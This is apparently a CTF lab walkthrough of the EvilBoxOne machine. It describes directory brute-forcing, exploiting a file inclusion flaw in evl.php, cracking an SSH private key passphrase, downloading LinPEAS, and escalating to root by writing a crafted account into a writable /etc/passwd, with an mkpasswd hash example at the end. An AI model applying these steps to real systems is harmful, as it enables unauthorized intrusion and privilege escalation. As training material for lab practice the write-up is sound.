1. Information collection
scan ip
Scan for open ports
Site probe, no information available.
probing directory files
access directories and files
The robots file is the name of the person, record it, try ssh blasting, it is invalid
Also blasted a directory secret/ and then tried to blast the files in the directory (dirsearch cannot run out)
Access the evl.php file
Nothing, and the return message has no content.
There is no content available so far, and we can only guess whether there is a parameter name after this url. There may be a file containment vulnerability
2. Information Utilization
First guess what the parameter name is, index.html is an existing file, --hw 0 hides the returned data is 0
If there is a return result, it means that the received parameters are correct, try to access sensitive files
You can switch the path to read the file, indicating that there is a file inclusion vulnerability.
Trying to use a pseudo-protocol to write a Trojan horse into the file, but it fails. Remote file inclusion is not possible.
It is found that there is no H4x0r user, but there is a mowree user. The previous ssh service on port 22, check whether this user has a key file
Found that there is a private key, copy and save, and blast the password of the private key
ssh link this user, success
View permissions, analyze file permissions, view files
Get flag1, check the file
LinPEAS is a script to search for possible paths to privilege escalation on Linux/Unix*/MacOS hosts
Download: mowree@EvilBoxOne:~$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
3. Escalation of rights
Found that the passwd file has write permissions
Idea: Generate a high-privilege account by yourself according to the passwd storage format, write it into the passwd file, and then switch users
Generate a password, switch users, and get root privileges
summary:
Kali directory scanning tools, and their dictionaries, are as follows
- /usr/share/wordlists/dirb/big.txt: number of dictionary lines 20469
- /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt: number of dictionary lines 220560
- /usr/share/dirb/wordlists/common.txt: number of dictionary lines 4614 (dirb default dictionary)
- /usr/lib/python3/dist-packages/dirsearch/db/dicc.txt: number of dictionary lines
- /usr/share/seclists This dictionary is more powerful and contains many dictionaries
mkpasswd: generate password
- mkpasswd can generate the password hash saved in the shadow file.
- # The specified algorithm is md5, the salt is 12345678, and the password is my_hash
- mkpasswd --method=md5crypt --salt=12345678 my_pass
- # $1$12345678$JklvlbDlb5LHHuzwbBK7f1